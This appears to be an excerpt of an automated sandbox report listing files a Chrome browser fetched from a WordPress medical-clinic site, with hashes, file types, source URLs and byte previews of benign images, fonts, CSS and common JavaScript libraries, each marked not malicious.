                                                                                                                                                                                                                                        Entropy (8bit):7.991095262700505
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:0E2270277C3414697F4F04B50FB4F547
                                                                                                                                                                                                                                        SHA1:10B401FC742976F8CA11FAA28E58FF37CE8554FD
                                                                                                                                                                                                                                        SHA-256:1EC5A1489986C334952EC03608D6DCD1384861C9F73537E76944DDC0F5252750
                                                                                                                                                                                                                                        SHA-512:CF4268D89F1054E3E101D946B86291E245899C855BADD46B59A350C193359E0597F29083EC64372CB304419C828D2A6EB6A944D502D11C2C94129A299C9C478C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...................................................!........'.."#%%%..),($+!$%$...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$......k...."..........5..................................................................d..........$OM>......KQ D..(.|..|.....5...8i..Lj.oCU[3...*.J]...U:.. ....'.......,..$..N..FF.g.m..S.Y.(.._.'...7O..WAQY...$mttZ..70dr....XN%.L.a.++Be,*e.....M..].O...._.......C$.".G.2J.#|....X..n.....JdB.D"`.6.%.;,...Z.[.:............,...,+Cn".vXW..eiD....^.....>oF.6 .......Vu. ....K.....X....=..w=.w.-.8..xe...2AQ6F...O.{............]...v.x........YIX.BI...y..}.%...U..u.0.|..."j..5..$I.(.{Ci.^R..j..1....U.'U.8......x.:.wY..?.~...2S..,..YKXYEf.iU..-F.aQ.DUVZ.....q.....R.$......n....\F....c.u.t...9....9..=.K.5.#..OC....".N.ad...E.x.G.W..kZ;1.V..qZ;,.....[....Ex..i..s..{.../O./?}...hx..<y.O."H.)[.S..H.k$nP..jt.oz..o...cd....).c.$....=.y.......s/.CV.n=I...).D..K.X.Y.,q.Gn6P:.I. ".y.....[._.........|.0&.P..UiiT.eT.[ef.,
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 1536 x 922, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):815613
                                                                                                                                                                                                                                        Entropy (8bit):7.981593337548619
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:4057DB597A080320E78B14C003CF4B62
                                                                                                                                                                                                                                        SHA1:A50F6C8BB58D52FC13A81FBFED11727943BCD4C9
                                                                                                                                                                                                                                        SHA-256:C74CDD960FE66C4399E7D531F23685F26A65CC9DDD421A0AFA79F8AF2744B250
                                                                                                                                                                                                                                        SHA-512:52C8524C657B7754B6753C97DEABBD43E5CB684ED2E1D874F0E2FD74EED4A6B172E0D27222203DF79415CEAAC1227078D495BFE524726BDBA1E9AF17841785CE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2024/02/108-1536x922.png
                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............^+......IDATx...Yw.%.n..%ED...........Z.U..C.B....@...#}.K.......$....lo...3bc2O.<.[.>._..w.g. -....nl~..@..ZC....X......7.............e..Z..7...f.f..y.Lk.=~.A.>..^..A).i...p8..J..A..Z...)s..@J..d......`p-....k.ea..m..y......'....^t..u.v..)x?~.}X).=^./....>.............}=~.>..?.jc......gR.).r\..Z..P.l.>...Z..[.^..f...Ci...=...~....N.^..J.b.......{...<.n]....`.g..k..*......"~.u....r.$r...]...0.\jn.s....{][..{q=d@Kg$1..k..+."...g..p8..OP..4.....x...4Gm.Dm.."..,../..[.?x1.I.6.w.RP..0.d...-.v....Gk,....g.u....s..uN?Y........m....\v.O.a..,^'.n.s.Y<.r.Fj.M...5.~....Z`.ms.5.h.h.3.}......y.........g..2.......g............{.s.k....g....z..{.8..^../Bno....l.r`.Y.&..iR..q...9..H...y-..%...xY...3........5./..8..m.r..Q.%D....^..{..{.lR.d.U.s.....;.....c. @)(.....t....S.E..l.'.oMs...p_.6..c..k.../....."..../..y...S.hU...x.]........@P...@..k).?^o..O...P.O.|......-g.ff.6Ao.`./[.....{._.....LA0,.....=...{Z.K..%.U.0..
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):105
                                                                                                                                                                                                                                        Entropy (8bit):4.219307275318062
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:5DA3B60463E337D27F7D908E45241CAD
                                                                                                                                                                                                                                        SHA1:B85E63082105D037AEE08D84F819E132A30D07CC
                                                                                                                                                                                                                                        SHA-256:5E037623ADAF84A7D40A1C49BE9BC9F3D92197FC09BBD8DB550553AD7D2F3191
                                                                                                                                                                                                                                        SHA-512:A53A90CD1638E93B766678B06563CC3084F4E36A9DD77B9B90A60D2D85BBAA972BB2132B23348DAFF54201A8F41664784D9B201FA80BA3404ADAAA3D4910824C
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/css/frontend-icon-style.min.css
                                                                                                                                                                                                                                        Preview:.fa-practis{visibility:hidden;position:relative}.fa-practis::before{visibility:visible;position:absolute}
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 21144, version 1.0
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):21144
                                                                                                                                                                                                                                        Entropy (8bit):7.989446116419254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:2BC7630144496092DC786CE63109E560
                                                                                                                                                                                                                                        SHA1:723DF3658078CFED03C85E47F15FC439EB4331BE
                                                                                                                                                                                                                                        SHA-256:7C9C80A6C32C0619D61C28F28723E68C5F8F75163E77EE5CF64C39E640E0D71E
                                                                                                                                                                                                                                        SHA-512:754A5961176362BFF5265B0ADCB5265635080CA863AA48361B74ACEEE98DB55814FDAF56ED56AB146B896F4454A5F6882D227557B88E06A1B24424A3B1F25DB5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/barlow/v12/7cHpv4kjgoGqM7E_DMs5.woff2
                                                                                                                                                                                                                                        Preview:wOF2......R...........R2.............................f..P.`..r.. ........L........6.$..4. ..J..M..V....6.....8..}.#.....g...7..W......Br2.0.1M{..H. ]....Q........&M...t....Ho..F.....A.,..+....d.oT-..4.%t....Od8...4v.(u.C5...Ts)..M|.q'.]....S.+.V....g......T.:n....u...?.=...<......e.!..K.....I.$M.4.X.Vh...bP(-..E..M...:...Q.....`s.....u.z.....}X.....e*....{.h..J2...*U...e.#J...(......H.Z.C.U....DE.(..B1...T.v...D........O.$...t....e{..;._K..m,|?...,$m.q..L..`1..]..v8g.nvZ.I....1.K).pA..m....T......+...q..SZ...4"..".D..O...]og....s{0...a.`.dK.7..m.Cn.>...W.....(.]._.7.=.5..&..".p..k.7..!...:...?~N.....vD....}.....)`..L.......v.t.2..~P:.]...c.d}..m+..[f...0..2...#..R-...')B..%&r.......r<.....n6..n.n.F.F.@.I.`Kc..L.7...H....F..f..H.eP..'.N).R..|r.p....N'...9.d...g|...w.v..[..fb_.(....M}w...6"....[...9....i-..0.....)....1../D$....9...W.Xi$........>..]....Yj..;@..A.6..:...QJ .@B....W......\..p.z.@L.=4.9...&..M.%...0AYX.l.P.A....*.P.z...A.2.j...|...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 338x176, components 3
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):8689
                                                                                                                                                                                                                                        Entropy (8bit):7.933922254860984
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:13CDCDB45E0580528CFA74A528FAAA8D
                                                                                                                                                                                                                                        SHA1:97BE931E59D91217C4CBCDD9E024DE69A2BEFB30
                                                                                                                                                                                                                                        SHA-256:D65842D2DEDC10B00725ADDF6D72389E97C8BC83C0F0F8E6B96C8D11504A8775
                                                                                                                                                                                                                                        SHA-512:66B998464FA5750D1161C8A92400509903972621D87E892C75309E6A6222A88ED84CB15B4F93F3F7FFED18A67D25066A7AF74D2FC0A1E3EDC31F9AFA62412DE8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/uploads/2021/02/dvt-and-vein.jpg
                                                                                                                                                                                                                                        Preview:...................................................'!..%..."."%()+,+. /3/*2'*+*...........*...**************************************************........R.."..........4........................................................................H}....._...K%Iu.N#.>9.b./...pp.!d..d.........mQ..mJ.[..s^..C...i.UZ...6._kNlLg.6.c1......W.-.s0....;V.......y....:.....`+.B.!....sN..S.....Z.!.oE.%ZJ...:.!....i...mZ....a...p8A.8Y.!.DFx3....~...C.......y..4uX8.\.qf.l5:].e.4.....m.Y.....E.6.ihu....e......5.....E.s!..@..U0.9FD......x.........+.K..J.....18:p....!i.....o.3..r.[...e.3R.@.a..(.30@Y..g....x`.... Q6.!.v....:)....*,.|....s..].y..8'.j...%`Q..Q{....{...d..K#0P..c...\..o...#W?.KF...&...Xja.Z...a..v..x".8..jl.[F...uzk.R.C....Q:.l.h.5jC\.aQ.o..~...._......;<..<..j...~..5...Z..#.X.c...P.8N%.a...9-.R.J... ..MK.r.tOeQkV..Ksb.... 2.r.A^E...t....y.Tg..q......&.K.v.....X.mG.....l.g.4R. 8........\H..^.Do.....9..l....z.r.sg..s.F.5K..x.3./%...q`.R>.p.v...;...c.....ciYn.3
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (699)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3082
                                                                                                                                                                                                                                        Entropy (8bit):5.092303476903107
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:EBCF9045BCA6563ED46D7C088DDDD33E
                                                                                                                                                                                                                                        SHA1:490B808898A44E17F87458CA1FA9A65A18A36013
                                                                                                                                                                                                                                        SHA-256:A70F51158655602D93E78FB7BB7D24DFFBC5C8B602AF8F7A50640B2FC2E76046
                                                                                                                                                                                                                                        SHA-512:2CDF4B52645DC06344593C7B42FE29E031734AAF7837D439E6EE8D396D9FA1F8924114E52CBA7A85FD63144C1BE3FFA66F61723F969433515A01265B7E650A22
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_40972936af67684ca90b6211f9216288.js
                                                                                                                                                                                                                                        Preview:(function(){window.mediaCheck=function(options){var breakpoints,checkQuery,convertEmToPx,createListener,getPXValue,hasMatchMedia,i,mmListener,mq,mqChange;mq=void 0;mqChange=void 0;createListener=void 0;convertEmToPx=void 0;getPXValue=void 0;hasMatchMedia=window.matchMedia!==undefined&&!!window.matchMedia("!").addListener;if(hasMatchMedia){mqChange=function(mq,options){if(mq.matches){if(typeof options.entry==="function"){options.entry(mq);}}else{if(typeof options.exit==="function"){options.exit(mq);}}.if(typeof options.both==="function"){return options.both(mq);}};createListener=function(){mq=window.matchMedia(options.media);mq.addListener(function(){return mqChange(mq,options);});window.addEventListener("orientationchange",(function(){mq=window.matchMedia(options.media);return mqChange(mq,options);}),false);return mqChange(mq,options);};return createListener();}else{breakpoints={};mqChange=function(mq,options){if(mq.matches){if(typeof options.entry==="function"&&(breakpoints[options.me
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:JPEG image data, progressive, precision 8, 280x132, components 3
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6315
                                                                                                                                                                                                                                        Entropy (8bit):7.910225738058787
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:FEDAA7C07A16D6D0F3D41621BC42D93C
                                                                                                                                                                                                                                        SHA1:58BFAE6EE0BE30644DD098AB91B49CB14864685D
                                                                                                                                                                                                                                        SHA-256:1A726DE5A07AF303424CD8972C6AD6FF370AE63B0C88570F7BD42FD6375A7AD7
                                                                                                                                                                                                                                        SHA-512:81C88688B9DB0A24B7956EA9760D8847D178BACCD3106EEA9C7C464B0BF084C5BFB2375F9381C5A0BF8F8DC9DBDECEE73E93F4DE9C59EBF88238336F3A23E1C3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...................................................'!..%..."."%()+,+. /3/*2'*+*...........*...**************************************************..........."..........4.................................................................K.....l3.b`....F...}..Q....-,..%....Q...e.k...y!.m5<O..j..H.rCx..E 2G...j...F. ..Ge..4A.].!........Up...m..M8>q.....6...7.r.. w]C.B..DI.......Gw".4..sw#_A.....V.FF.^zLE..<.....;.V...e.=.O....f<K...i.U..WUi.;..U..B].q.z.:.PMw...v....wn....G......V...W..W...r..^..c.t....L..L(=..i......'.Ia^<..M...TN..6...t......2...x.n...e...g1v.6.c-.OOU......J....^.!...4!..S.+.Q.z..%.............U...J{)n..SC`ck"f.V.....,nil..j.G...........r......p........<...?.....-..W....F....A.I...9...[..V.WH.[^..8.7...Y]...<.@. .......D..8.2.?uW......^.`.m.Y.K)....9.hs.4..o#..e....&7.6..awxu.#...........(.fk=HLV...V....W......AI.....=.=,(.`Sp........?........................!.1A."2Qa..#q.03BRb... CS......%4c...........?....6..\Q.d;V...........`.....'...t.
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:PNG image data, 300 x 300, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13217
                                                                                                                                                                                                                                        Entropy (8bit):7.94934724370814
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:F6C2758D536608011BCAA199CC0CF1ED
                                                                                                                                                                                                                                        SHA1:C1356C047FDB3E215635261192E97AF51C6C7733
                                                                                                                                                                                                                                        SHA-256:3B0C5E3F5C2B4694E7106CEA79DB54858CF25D33CD4D28BA7F7F1A7B0DEE688E
                                                                                                                                                                                                                                        SHA-512:5D5061628A34CC60AD732CCD74D50EA0554EFE5FF66B3C9942294123B5672C14C6DE62D331C5C7686AA94C0259D5B942EB045E296AD7E6A0925F70B50F2FA40B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.PNG........IHDR...,...,.....N.~G....PLTEGpL......V.^2.D...U+s.JB7/O...4.O9.Q^0.......!zK...c2.......`0._..`/._..`/.`/.!qJW*t..."rJ_.....)xH%tI".Mk9.^.~......&vJ..Xr?."rJ&wJU.\b1.I"`+|I pJg5.r?.I"`E.Y.....]..T..U..NF [E Z].Y..W..T'zJH!^0.I0.Js@...S4.I..bP.D..b2.II"`..SF \q>...c..bxD...^I"_rA.N.a..^..c..^P.Du._..\S.a.._M$dY.`..]..^..].._V.C.._..]..^..}.._4.b_.......S.rKD.X!uLi7.q>.a0.'zK.}.g5.n<.,~JtA.$wK......G.FyE.{G..~.wC.d3. nI:.H0{Wl9.@.G5.HG"\L)_)wS1.Ih;.{P.n..pD.V.vP.q.Z.<.a7~\l?.h.....t..e5.K.l.s.O.Dz..wL..i.sH....U)q..Zb1...U....T.R.e.d....A.e.n.c....Y..W..X..d^.}.x.Z,xZ3pL#c.`...a[.z..^b:zF.i..` .k..bP&j.....[-.w..g..^&.q:.3.~.X.B...\....d..c._......c@.c.........P.......&.c...{.`v.a.a.e...V.aK.a.}.i.m.a....b6.c.T.]...`.._.._.....s..n..x..j...b.j...).x....q..zh.x.l....L.t.......[...jtRNS..0..u......5..*\I..%..u..WK..>fSe..;.7...).nz.....;.f...c........l....~.....m........................ .IDATx...KH.....t4A#.......t.-...U.vW/.p7wu1C....j..H@.....$...
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1143)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):4272
                                                                                                                                                                                                                                        Entropy (8bit):5.407649241930215
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B427175FA1078775EB792756E7B6D1E7
                                                                                                                                                                                                                                        SHA1:4C55C0233D3D9002B3449C025F97821F8BB8900D
                                                                                                                                                                                                                                        SHA-256:EE147E859AD0F09AA50367974E38AB53E7C7054C4A51D400A7F45B0EB251454F
                                                                                                                                                                                                                                        SHA-512:AF8D384188363378BC99C2E51523E74E1D18BA77D51BFF7647A377A117499421F9E94477E09907925E46DAD0A908B799A616D0B4855FFFF064BA6350815063D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.gstatic.com/cv/js/sender/v1/cast_sender.js
                                                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.'use strict';var l=function(){var a=h,b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},m=this||self,n=/^[\w+/_-]+[=]{0,2}$/,p=null,q=function(a){return(a=a.querySelector&&a.querySelector("script[nonce]"))&&(a=a.nonce||a.getAttribute("nonce"))&&n.test(a)?a:""},r=function(a,b){function e(){}e.prototype=b.prototype;a.i=b.prototype;a.prototype=new e;a.prototype.constructor=a;a.h=function(c,g,k){for(var f=Array(arguments.length-2),d=2;d<arguments.length;d++)f[d-2]=arguments[d];.return b.prototype[g].apply(c,f)}},t=function(a){return a};function u(a){if(Error.captureStackTrace)Error.captureStackTrace(this,u);else{var b=Error().stack;b&&(this.stack=b)}a&&(this.message=String(a))}r(u,Error);u.prototype.name="CustomError";var v=function(a,b){a=a.split("%s");for(var e="",c=a.length-1,g=0;g<c;g++)e+=a[g]+(g<b.length?b[g]:"%s");u.call(this,e+a[c])};r(v,u);v.prototype.name="Asse
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):1607
                                                                                                                                                                                                                                        Entropy (8bit):5.026316703166179
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:B866077B4CE91065C64332A24E8477CA
                                                                                                                                                                                                                                        SHA1:00E9F3BA1F0207B8234D2D65538CC143731619CE
                                                                                                                                                                                                                                        SHA-256:01EFBFDEE0048462A3B31C5555C015EC2EE6836A6BB9F10D4D636C047911CEE8
                                                                                                                                                                                                                                        SHA-512:A9177B8091373D95BDA3291501E9E3226A097A38D763723661B989BA42DDAB297546C4882BF6CF170A027536B5446B5EDDBA64D5580C6463EB3408B538A93B7F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_58be82360cff05a82d3af2e489d97263.js
                                                                                                                                                                                                                                        Preview:;(function($){$.fn.recliner=function(options){var $w=$(window),elements=this,selector=this.selector,loaded,timer,options=$.extend({attrib:"data-src",throttle:300,threshold:100,printable:true,live:true},options);function load(e){var $e=$(e),source=$e.attr(options.attrib);type=$e.prop('tagName');if(source){if(type=='IMG'||type=='IFRAME'){$e.attr('src',source);}.else{$e.addClass('lazy-loading');$e.load(source,function(ev){onload($e);});return;}}.onload($e);}.function onload(e){e.removeClass('lazy-loading');e.addClass('lazy-loaded');e.trigger('lazyshow');}.function process(){var inview=elements.filter(function(){var $e=$(this);if($e.css('display')=='none')return;var viewportHeight=(typeof window.innerHeight!=='undefined')?window.innerHeight:$w.height();var wt=$w.scrollTop(),wb=wt+viewportHeight,et=$e.offset().top,eb=et+$e.height();return eb>=wt-options.threshold&&et<=wb+options.threshold;});loaded=inview.trigger("lazyload");elements=elements.not(loaded);}.function init(els){els.one("lazylo
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (20618)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):50839
                                                                                                                                                                                                                                        Entropy (8bit):5.6683383182408384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:24E902067369DE547121BAB3951B0583
                                                                                                                                                                                                                                        SHA1:939D6CDD550FC1D5E36C5379458C078DD724AFD4
                                                                                                                                                                                                                                        SHA-256:DF6FE4366AF4E9E7576583B25CB34098E9E2F616F36E2B61D6B7D99DF68612E5
                                                                                                                                                                                                                                        SHA-512:8F8A68680B1AC64BF2AE14C54274D492E5DC93BC83D8A075A89C78763E3F5BC2B1A6F069FF7676590F471A779953B9FC144B88A5422366B70605E7618A494F5B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                        Preview:/**. * Minified by jsDelivr using Terser v5.19.2.. * Original file: /npm/crypto-js@4.1.1/crypto-js.js. *. * Do NOT use SRI with dynamically generated files! More information: https://www.jsdelivr.com/using-sri-with-dynamic-files. */.!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,(function(){var t,e,r,i,n,o,s,a,c=c||function(t,e){var r;if("undefined"!=typeof window&&window.crypto&&(r=window.crypto),"undefined"!=typeof self&&self.crypto&&(r=self.crypto),"undefined"!=typeof globalThis&&globalThis.crypto&&(r=globalThis.crypto),!r&&"undefined"!=typeof window&&window.msCrypto&&(r=window.msCrypto),!r&&"undefined"!=typeof global&&global.crypto&&(r=global.crypto),!r&&"function"==typeof require)try{r=require("crypto")}catch(t){}var i=function(){if(r){if("function"==typeof r.getRandomValues)try{return r.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof r.randomBytes)try{return r.random
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):3501
                                                                                                                                                                                                                                        Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                        SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                        SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                        SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/static/service_worker/53k0/sw_iframe.html?origin=https%3A%2F%2Fmipscenter.com
                                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):88247
                                                                                                                                                                                                                                        Entropy (8bit):4.96191493674792
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:E1123A85F805D435AB13CEFDA33BC8DB
                                                                                                                                                                                                                                        SHA1:FB86EB4DE0655447DE965FCCC39479CB18F7AEE6
                                                                                                                                                                                                                                        SHA-256:223B2A4C85A7E508C8C95F846E9D7A1EB7D3833D561F5B4E0D998C674D3EFB39
                                                                                                                                                                                                                                        SHA-512:94254B3E88BA36A0FFA65DB5E761A6406F9A5BF78C885305CCE57D2AA727C6A45E1D9510D148AD34DEC04EB3B4A1F8FAF133E3F06801138BE0A0BFC54E357D85
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-includes/css/dist/components/style.min.css
                                                                                                                                                                                                                                        Preview:@charset "UTF-8";:root{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33,69,230;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:24,58,214;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.components-animate__appear{animation:components-animate__appear-animation .1s cubic-bezier(0,0,.2,1) 0s;animation-fill-mode:forwards}@media (prefers-reduced-motion:reduce){.components-animate__appear{animation-delay:0s;animation-duration:1ms}}.components-animate__appear.is-from-top,.components-animate__appear.is-from-top.is-from-left{transform-origin:top left}.components-animate__appear.is-from-top.is-from-right{transform-origin:top right}.components-animate__appear.is-from-bottom,.components-animate__appear.is-from-bottom.is-from-left{transform-origin:bottom left}.components-animate__appear.is-from-bottom.is-from
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                        Size (bytes):168
                                                                                                                                                                                                                                        Entropy (8bit):4.702128859202601
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:AA0DB0337210B8819D65DDC5CEA890CD
                                                                                                                                                                                                                                        SHA1:905437B045C7F39CAAD18229040774F11A51EBF9
                                                                                                                                                                                                                                        SHA-256:3EA8E1520EA55BCDACE9234E5C6260A9B213F9A4ABA08D8843FB0544F84D9ED3
                                                                                                                                                                                                                                        SHA-512:580A53E802496DDE72B70D8860203A1C1B3F3C4AF5E457684F6831F5986AB2C9C5029E4C1BF7DE972BF8D6E490E7B7F92ABCE7ED88EE27FC437863A0F0BC0095
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        URL:https://mipscenter.com/wp-content/cache/autoptimize/js/autoptimize_single_a9b8772172f95ce2efaf68dfd58e4152.js
                                                                                                                                                                                                                                        Preview:(function($){'use strict';$('a').filter(function(){return this.hostname&&this.hostname!==location.hostname;}).attr("target","_blank").attr("rel","noopener");})(jQuery);
                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1136)
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1609
                                                                                                                                                                                                                                        Entropy (8bit):5.268171846580519
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                        MD5:20D444971B8254AC39C8145D99D6CA4C
                                                                                                                                                                                                                                        SHA1:72E41F2A340F4A6E3A748CB57D293631390B733A
                                                                                                                                                                                                                                        SHA-256:A04F41837D317573EA61EA29ABBA7C4FF4E38C9177DA68F4706B9C13921A8D82
